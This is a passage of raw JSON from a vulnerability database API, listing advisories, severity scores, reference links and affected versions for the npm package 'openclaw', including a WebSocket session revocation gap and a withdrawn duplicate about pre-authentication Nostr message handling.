vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerabili
ty":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerabili
ty":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41378","GHSA-gjm7-hw8f-73rq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yp2w-pc58-9bf6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89997?format=json","vulnerability_id":"VCID-ywrn-52gx-f3ad","summary":"OpenClaw: Gateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation\n## Summary\nGateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: v2026.3.28 rotates device tokens without disconnecting already-authenticated WebSocket sessions, which is a real but post-compromise revocation gap.\n\n## Affected Packages / Versions\n- 
Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `91f7a6b0fd67b703897e6e307762d471ca09333d` — 2026-03-31T09:05:34+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41356","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41356"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/91f7a6b0fd67b703897e6e307762d471ca09333d","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","
scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"}],"url":"https://github.com/openclaw/openclaw/commit/91f7a6b0fd67b703897e6e307762d471ca09333d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rfqg-qgf8-xr9x","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rfqg-qgf8-xr9x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41356","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41356"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websoc
ket-session-termination-in-device-token-rotate","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-in-device-token-rotate"},{"reference_url":"https://github.com/advisories/GHSA-rfqg-qgf8-xr9x","reference_id":"GHSA-rfqg-qgf8-xr9x","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rfqg-qgf8-xr9x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-
x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-
gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41356","GHSA-rfqg-qgf8-xr9x"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ywrn-52gx-f3ad"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89498?format=json","vulnerability_id":"VCID-z3rc-xpx7-fkcu","summary":"Duplicate Advisory: OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-65h8-27jh-q8wv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 performs cryptographic and dispatch operations on inbound Nostr direct messages before enforcing sender and pairing policy validation. 
Attackers can trigger unauthorized pre-authentication computation by sending crafted DM messages, enabling denial of service through resource exhaustion.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X
/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35627","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35627"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling"},{"reference_url":"https://github.com/advisories/GHSA-2j53-2c28-g9v2","reference_id":"GHSA-2j53-2c28-g9v2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2j53-2c28-g9v2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability
":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability
":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability
":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nk